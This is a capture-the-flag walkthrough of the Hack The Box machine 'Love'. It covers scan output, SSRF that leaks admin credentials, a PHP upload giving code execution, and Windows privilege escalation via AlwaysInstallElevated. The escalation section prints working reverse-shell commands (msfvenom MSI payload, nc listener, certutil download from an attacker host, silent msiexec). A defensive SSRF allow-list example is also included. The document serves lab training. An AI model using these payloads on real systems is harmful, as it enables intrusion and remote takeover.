
Hackthebox - Love


Last updated 2 years ago

  • Windows

Nmap

┌──(root💀kali)-[/home/kali]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.10.239
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 20:34 EDT
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.024s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
| tls-alpn: 
|_  http/1.1
|_http-title: 403 Forbidden
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m36s, deviation: 4h02m31s, median: 21m34s
| smb2-time: 
|   date: 2022-07-17T00:59:26
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-07-16T17:59:28-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.10 seconds

Port 80

  • We can add these 2 lines to our file /etc/hosts

10.10.10.239    love.htb
10.10.10.239    www.love.htb

Dirb

┌──(kali㉿kali)-[~]
└─$ dirb http://www.love.htb/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 16 20:54:11 2022
URL_BASE: http://www.love.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://www.love.htb/ ----
==> DIRECTORY: http://www.love.htb/admin/
==> DIRECTORY: http://www.love.htb/Admin/
==> DIRECTORY: http://www.love.htb/ADMIN/
+ http://www.love.htb/aux (CODE:403|SIZE:302)
+ http://www.love.htb/cgi-bin/ (CODE:403|SIZE:302)
+ http://www.love.htb/com1 (CODE:403|SIZE:302)
+ http://www.love.htb/com2 (CODE:403|SIZE:302)
+ http://www.love.htb/com3 (CODE:403|SIZE:302)
+ http://www.love.htb/con (CODE:403|SIZE:302)
==> DIRECTORY: http://www.love.htb/dist/
+ http://www.love.htb/examples (CODE:503|SIZE:402)
==> DIRECTORY: http://www.love.htb/images/
==> DIRECTORY: http://www.love.htb/Images/
==> DIRECTORY: http://www.love.htb/includes/
+ http://www.love.htb/index.php (CODE:200|SIZE:4388)
+ http://www.love.htb/licenses (CODE:403|SIZE:421)
+ http://www.love.htb/lpt1 (CODE:403|SIZE:302)
+ http://www.love.htb/lpt2 (CODE:403|SIZE:302)
+ http://www.love.htb/nul (CODE:403|SIZE:302)
+ http://www.love.htb/phpmyadmin (CODE:403|SIZE:302)
==> DIRECTORY: http://www.love.htb/plugins/
+ http://www.love.htb/prn (CODE:403|SIZE:302)
+ http://www.love.htb/server-info (CODE:403|SIZE:421)
+ http://www.love.htb/server-status (CODE:403|SIZE:421)
+ http://www.love.htb/webalizer (CODE:403|SIZE:302)

---- Entering directory: http://www.love.htb/admin/ ----
+ http://www.love.htb/admin/aux (CODE:403|SIZE:302)
+ http://www.love.htb/admin/com1 (CODE:403|SIZE:302)
+ http://www.love.htb/admin/com2 (CODE:403|SIZE:302)
+ http://www.love.htb/admin/com3 (CODE:403|SIZE:302)
+ http://www.love.htb/admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://www.love.htb/admin/includes/
+ http://www.love.htb/admin/index.php (CODE:200|SIZE:6198)
+ http://www.love.htb/admin/lpt1 (CODE:403|SIZE:302)
+ http://www.love.htb/admin/lpt2 (CODE:403|SIZE:302)
+ http://www.love.htb/admin/nul (CODE:403|SIZE:302)
+ http://www.love.htb/admin/prn (CODE:403|SIZE:302)

---- Entering directory: http://www.love.htb/Admin/ ----
+ http://www.love.htb/Admin/aux (CODE:403|SIZE:302)
+ http://www.love.htb/Admin/com1 (CODE:403|SIZE:302)
+ http://www.love.htb/Admin/com2 (CODE:403|SIZE:302)
+ http://www.love.htb/Admin/com3 (CODE:403|SIZE:302)
+ http://www.love.htb/Admin/con (CODE:403|SIZE:302)
==> DIRECTORY: http://www.love.htb/Admin/includes/
[STRIPPED]

-----------------
END_TIME: Sat Jul 16 21:02:26 2022
DOWNLOADED: 18448 - FOUND: 47

Port 443

  • We get some useful info to keep aside

ValentineCorp
love.htb
staging.love.htb
roy@love.htb
  • We get a new subdomain this way

Port 80

  • We can access the new subdomain through port 80

  • What if we try one of the other ports, like 5000? (I got a Forbidden when trying to access it directly earlier.)

  • In the Voters menu we can upload a file

  • If we try to execute one-liners we might need to encode our shells, because they do not work as is.

  • However, when reading the script you will notice that the URLs are not the right ones for us. Here is how to modify the beginning of the script so that it works:

IP = "www.love.htb" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.3" # Reverse shell IP
REV_PORT = "4444" # Reverse port 
# --------------------------------

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
[STRIPPED]
  • And of course you need to put in your own IP and the website target. Also note that the payload is indeed encoded.

Privesc

  • We can run winpeas

  • msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.2 lport=5555 -f msi > gabrielle.msi

  • We set our listener rlwrap nc -lvp 5555

  • We serve it with python

  • We get it on the target certutil.exe -urlcache -f http://10.10.14.2/gabrielle.msi gabrielle.msi

  • msiexec /i C:\xampp\htdocs\omrs\images\gabrielle.msi /quiet /qn /norestart

When browsing in the includes we find this page

If we look up "voting system sourcecodester" on Google we get and

We can try to check out the certificate

We get a free file scanner with a demo option

I tried to see with http://127.0.0.1, but if we set up a python server we could try to see if it actually fetches a file, and it does

It works! We get creds for the admin panel!!
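The scanner on the staging host fetches whatever URL it is given, which is why http://127.0.0.1:5000 became reachable from the outside. As an added example (not part of the original writeup or of the Voting System code), this is the allow-list check such a fetcher needs before it makes the request; the hostnames and the DNS table are constructed so that it runs offline:

```python
"""Allow-list check for a server-side URL fetcher (added example, not the
writeup's or the Voting System's code). It refuses schemes other than http(s),
non-standard ports such as 5000, credentials in the URL, and any hostname that
resolves to a loopback, private or otherwise non-public address."""
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host):
    """Every address a name resolves to (real DNS; demo_resolver() below is offline)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def blocked_reason(url, resolver=resolve_all):
    """Return None if the URL may be fetched, otherwise a short reason it was refused."""
    try:
        parts = urlparse(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return "unparseable URL or port"
    if parts.scheme not in ALLOWED_SCHEMES:
        return f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return "missing host"
    if parts.username or parts.password:
        return "credentials in URL"
    if port not in ALLOWED_PORTS:
        return f"port {port} not allowed"
    # Resolve first and vet every answer: a harmless-looking name may hide a
    # loopback or RFC 1918 address among its records. A real fetcher must also
    # re-run this check on every redirect target before following it.
    try:
        addrs = resolver(host)
    except (socket.gaierror, OSError):
        return "host does not resolve"
    for addr in sorted(addrs):
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 scope id
        if not ip.is_global:
            return f"{host} resolves to non-public address {addr}"
    return None


# Constructed DNS table so the example runs offline; these are not real records.
DEMO_DNS = {
    "files.example.com": {"1.2.3.4"},                # constructed public address
    "rebind.example.com": {"1.2.3.4", "127.0.0.1"},  # a public answer plus a loopback one
    "staging.love.htb": {"10.10.10.239"},            # the box's lab address (RFC 1918)
}


def demo_resolver(host):
    """Offline stand-in for resolve_all(), backed by DEMO_DNS."""
    try:
        return {str(ipaddress.ip_address(host))}  # IP literal: nothing to look up
    except ValueError:
        pass
    if host in DEMO_DNS:
        return DEMO_DNS[host]
    raise socket.gaierror(f"constructed: no record for {host}")


if __name__ == "__main__":
    for candidate in (
        "http://files.example.com/report.pdf",
        "http://127.0.0.1:5000/",  # what the scanner on staging was asked to fetch
        "http://127.0.0.1/",
        "http://[::1]/",
        "http://rebind.example.com/",
        "http://staging.love.htb/",
        "file:///C:/xampp/htdocs/omrs/",
    ):
        print(f"{candidate:40} -> {blocked_reason(candidate, demo_resolver) or 'allowed'}")
```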

If we connect we get an admin panel

We make an info.php file with a whoami command inside

Let's check in the images folder (we found it previously with dirb) whether it gets there.

It does, and if we click on it our command is executed

I decided to have a look at other exploits for the voting system now that we are authenticated. And I could find

It works and we have a reverse shell as phoebe

We can grab the user flag

Let's try this. is a way to exploit AlwaysInstallElevated

We are root!!
